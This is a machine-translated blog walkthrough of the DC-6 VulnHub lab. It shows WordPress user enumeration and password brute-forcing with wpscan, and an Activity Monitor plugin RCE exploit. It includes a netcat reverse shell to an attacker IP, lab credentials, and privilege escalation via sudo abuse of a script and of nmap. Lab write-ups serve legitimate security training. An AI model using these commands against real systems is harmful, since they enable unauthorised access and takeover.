当前位置:网站首页>DC-6 -- vulnhub range
DC-6 -- vulnhub range
2022-07-26 00:32:00 【Headwind/】
Range download address
Range clues :
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
kali decompression
gzip -d rockyou.txt.gz
The host found
Redirect found , modify hosts file
vim /etc/hosts
Website detection
wordpress, And mentioned plug-ins and security
Blasting users
wpscan --url http://wordy/ -e u
preservation , Use the password dictionary of clues to explode
wpscan --url http://wordy/ -P /root/ desktop /passwords.txt -U /root/ desktop /user.txt
Username: mark, Password: helpdesk01
Log in to the backstage website
http://wordy/wp-login.php
After coming backstage , Plug in found activity monitor, Try to find any loopholes
getshell
searchsploit activity monitor
Remote code execution vulnerability , Download to current path
searchsploit -m php/webapps/50110.py
perform
python3 50110.py
After execution, you need to enter the target ip Address and background login account password , After successful execution, a shell
nc -lvvp 4444
nc -e /bin/bash 192.168.194.156 4444
Get interaction shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Raise the right
Reference resources
Came to home Catalog , stay mark/stuff Find one of them things-to-do.txt, obtain
user graham
password GSo7isUM1D4
Switching users
[email protected]:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4
See what you can do
[email protected]:/home/jens$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
towards backups.sh Write in file ”/bin/bash”, And jens The user executes the script
echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh
After successful execution , Switch to the jens user
The user can execute nmap, Can pass namp Raise the right
echo 'os.execute("/bin/sh")' >getShell
sudo nmap --script=getShell
summary
Unfamiliar with the process of raising rights
边栏推荐
- Solve page refresh without attaching data
- 对比7种分布式事务方案,还是偏爱阿里开源的Seata(原理+实战)
- 【NumPy中数组相关方法】
- Flask send verification code logic
- [hero planet July training leetcode problem solving daily] 25th tree array
- Verilog grammar basics HDL bits training 06
- Four characteristics and isolation level of MySQL transactions
- LCA 三种姿势(倍增,Tarjan+并查集,树链剖分)
- 融合聚类信息的技术主题图可视化方法研究
- markdown写作平台
猜你喜欢
![[paper notes] - target attitude estimation Epro PNP 2022 CVPR](/img/96/9d3887c897950c4acaa7a01eb08b10.png)
[paper notes] - target attitude estimation Epro PNP 2022 CVPR
Modeling and simulation analysis of online medical crowdfunding communication based on SEIR model
DC-6--vulnhub靶场
对“DOF: A Demand-oriented Framework for ImageDenoising“的理解
8 tips - database performance optimization, yyds~
Research on text classification of e-commerce comments based on mffmb
Matlab makes the image of serial port output data in real time
C语言 预处理详解
【无标题】如何实现可插拔配置?
白蛋白纳米-超声微泡载组织型纤溶酶原激活物基因靶向制备研究
随机推荐
实战演练 | 查找在给定时间范围内购买超过 N 件商品的客户
融合聚类信息的技术主题图可视化方法研究
Research on the integrated data quality management system and technical framework under the scenario of data circulation and transaction
Multitask programming
【NumPy中数组相关方法】
Solve page refresh without attaching data
Mwec: a new Chinese word discovery method based on multi semantic word vector
基于MFFMB的电商评论文本分类研究
解决背景图设置100%铺满时,缩放浏览器出现水平滚动条时,滚动条超出的部分背景图没有铺满的问题
The way of understanding JS: what is prototype chain
攻防世界web题-favorit_number
HNOI2012矿场搭建
牛血清白蛋白修饰牛红细胞超氧化物歧化酶SOD/叶酸偶联2-ME白蛋白纳米粒的制备
Study on gene targeting preparation of tissue plasminogen activator loaded on albumin nano ultrasonic microbubbles
8种MySQL常见SQL错误用法,我全中
Leetcode 笔记 121. 买卖股票的最佳时机
【NumPy中数组创建】
数据流通交易场景下数据质量综合管理体系与技术框架研究
使用CMake编译OpenFoam求解器
What is software testing peer review?